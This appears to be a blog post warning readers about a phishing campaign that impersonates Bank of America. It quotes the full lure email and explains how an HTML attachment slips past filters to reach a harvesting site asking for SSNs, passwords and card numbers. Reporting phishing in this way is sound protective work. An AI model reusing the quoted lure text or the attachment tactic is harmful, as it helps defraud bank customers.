The email itself is fairly standard for a Phish, omitting both the user’s actual name or any reference to the real account number, instead relying on generic terms like “Dear Member.”
There are also are some spelling inconsistencies, including in the Subject line itself which includes “Informatiom” rather than “Information”
The complete email:
Subject: Bank of America Alert: Secure Your Online Banking Informatiom
From: ”Bank of America”
Dear Member,
As part of our efforts to provide a safe and secure environment for the
online community, we regularly screen account activity.
Our review of your account has identified an issue regarding its safe use.
We have placed a restriction on your account as a precaution.
To lift the restriction we will require some further information from you.
If, once we review your further information and we’re confident that the
use of your account does not present a safety risk to our service and
customers, we’ll be happy to reinstate your account.
We have sent you an attachment which contains all the necessary steps in order to restore your account access.
Download and open it in your browser.
After we have gathered the necessary information, you will regain full access to your account.
We thank you for your prompt attention to this matter.
Very sincerely,
Bank of America Review Department
Notice that while the email claims to be from “Bank of America”
What’s slightly different about this Phishing scam is that the email itself doesn’t contain the malicious hyperlink and the attachment isn’t an executable file, these being to the most common phishing tactics.
Instead, the email includes an HTML attachment to help avoid spam and security filtering, and it is that attachment leads to the Phishing host site.
Once you’re on the site, visitors are prompted to provide just about every piece of account data to the con artists. Directions on the harvesting site include:
Provide answers to the following authentication questions to help us identify you and your account.
To complete verification, you will be taken through the following stages:
1. Input your Personal Information
2. Input your Account Information
3. Input your Online Banking Information
4. Click on Continue
The data that you’re asked to provide includes everything a criminal would need to steal your identity, your money and essentially ruin your life. They’re not just Phishing for your Bank of America account (though they’ll clean that out too) but also ask for:
* Date of Birth
* Social Security Number
* Mother’s Maiden Name
* Bank of America Login/Password
* Credit Card Numbers
* “SiteKey” Challenge Questions and responses
While this Phishing fraud may or may not have a high success rate, the depth and duration of the damage done to anyone who falls for the ruse will be absolutely devastating.
While the current campaign targets Bank of America, this will no doubt be adapted to target many other financial institutions in the future.
No comments:
Post a Comment